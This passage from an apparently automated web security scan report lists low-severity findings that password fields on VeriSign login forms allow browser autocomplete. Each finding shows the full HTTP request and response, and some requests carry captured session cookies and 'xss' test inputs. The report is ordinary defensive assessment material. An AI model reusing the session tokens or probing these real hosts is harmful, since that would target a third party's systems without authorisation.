HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.7. https://knowledge.verisign.ch/support/trust-seal-support/index.html
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.8. https://knowledge.verisign.com/support/code-signing-support/index
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.9. https://knowledge.verisign.com/support/code-signing-support/index.html
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index.html
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.10. https://knowledge.verisign.com/support/digital-id-support/index.html
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/digital-id-support/index.html
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.11. https://knowledge.verisign.com/support/eca-support/index.html
Summary
Severity: Low
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/eca-support/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/eca-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.12. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
Summary
Severity: Low
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/index
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:51 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 42730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.13. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
Summary
Severity: Low
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/mpki-for-ssl-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:45:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.14. https://knowledge.verisign.com/support/mpki-support/index.html
Summary
Severity: Low
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-support/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.15. https://knowledge.verisign.com/support/ssl-certificates-support/index
Summary
Severity: Low
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/index
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 46210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.16. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
Summary
Severity: Low
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.17. https://knowledge.verisign.com/support/trust-seal-support/index.html
Summary
Severity: Low
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/trust-seal-support/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.18. https://products.verisign.com/geocenter/reseller/logon.do
Summary
Severity: Low
Confidence: Certain
Host: https://products.verisign.com
Path: /geocenter/reseller/logon.do
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
POST /geocenter/reseller/logon.do HTTP/1.1 Host: products.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false Content-Length: 40 Cache-Control: max-age=0 Origin: https://knowledge.verisign.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765 userName=xss&password=xss&submit=Sign+In
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:02 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17164 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]... <td width="600" valign="top"> <form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8"> <table>...[SNIP]... <td> <input type="password" name="password" maxlength="20" size="16" value="xss" style="width:130px;"> </td>...[SNIP]...
11.19. https://products.verisign.com/geocenter/reseller/logon.jsp
Summary
Severity: Low
Confidence: Certain
Host: https://products.verisign.com
Path: /geocenter/reseller/logon.jsp
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /geocenter/reseller/logon.jsp HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:15 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17095 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]... <td width="600" valign="top"> <form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8"> <table>...[SNIP]... <td> <input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;"> </td>...[SNIP]...
11.20. https://products.verisign.com/geocenter/reseller/register.do
Summary
Severity: Low
Confidence: Certain
Host: https://products.verisign.com
Path: /geocenter/reseller/register.do
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /geocenter/reseller/register.do?partner=verisignamerica HTTP/1.1 Host: products.verisign.com Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; JSESSIONID=hhyjTqGBLMJv7h9GbgyHDvJq3QYY5gY8yGM9GyGkjbGQWTH48hf1!1264420788; mbox=session#1315621455064-973488#1315623594|PC#1315621455064-973488.19#1378693734|check#true#1315621794; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.10.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-3-99____
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Fri, 09 Sep 2011 21:28:28 GMT Pragma: No-cache Content-Type: text/html;charset=UTF-8 Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17095 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]... <td width="600" valign="top"> <form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8"> <table>...[SNIP]... <td> <input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;"> </td>...[SNIP]...
11.21. http://query.verisign.ch/search
Summary
Severity: Low
Confidence: Certain
Host: http://query.verisign.ch
Path: /search
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.22. http://query.verisign.com/search
Summary
Severity: Low
Confidence: Certain
Host: http://query.verisign.com
Path: /search
Issue detail
The page contains a form with the following action URL: https://test-products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:07 GMT Server: saws Cache-Control: private Content-Type: text/html Vary: Accept-Encoding Content-Length: 52678 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.23. https://query.verisign.com/search
Summary
Severity: Low
Confidence: Certain
Host: https://query.verisign.com
Path: /search
Issue detail
The page contains a form with the following action URL: https://test-products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /search HTTP/1.1 Host: query.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 44676 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.24. https://ssl-certificate-center.verisign.ch/process/retail/console_login
Summary
Severity: Low
Confidence: Certain
Host: https://ssl-certificate-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The page contains a form with the following action URL: https://ssl-certificate-center.verisign.ch/process/retail/console_login.do The form contains the following password field with autocomplete enabled: enrollment.account.password
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"> <input name="referrerPath" type="hidden" value="">...[SNIP]... </script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"> <script language="JavaScript">...[SNIP]...
11.25. https://ssl-certificate-center.verisign.com/process/retail/console_login
Summary
Severity: Low
Confidence: Certain
Host: https://ssl-certificate-center.verisign.com
Path: /process/retail/console_login
Issue detail
The page contains a form with the following action URL: https://ssl-certificate-center.verisign.com/process/retail/console_login.do The form contains the following password field with autocomplete enabled: enrollment.account.password
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: Apache Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"> <input name="referrerPath" type="hidden" value="">...[SNIP]... </script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"> <script language="JavaScript">...[SNIP]...
11.26. https://test-products.verisign.com/geocenter/reseller/logon.do
Summary
Severity: Low
Confidence: Certain
Host: https://test-products.verisign.com
Path: /geocenter/reseller/logon.do
Issue detail
The page contains a form with the following action URL: https://test-products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /geocenter/reseller/logon.do HTTP/1.1 Host: test-products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:46 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 17100 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]... <td width="600" valign="top"> <form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8"> <table>...[SNIP]... <td> <input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;"> </td>...[SNIP]...
11.27. https://trust-center.verisign.ch/process/retail/console_login
Summary
Severity: Low
Confidence: Certain
Host: https://trust-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The page contains a form with the following action URL: https://trust-center.verisign.ch/process/retail/console_login.do The form contains the following password field with autocomplete enabled: enrollment.account.password
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"> <input name="referrerPath" type="hidden" value="">...[SNIP]... </script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"> <script language="JavaScript">...[SNIP]...
11.28. https://trust-center.verisign.com/process/retail/console_login
Summary
Severity: Low
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/console_login
Issue detail
The page contains a form with the following action URL: https://trust-center.verisign.com/process/retail/console_login.do The form contains the following password field with autocomplete enabled: enrollment.account.password
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
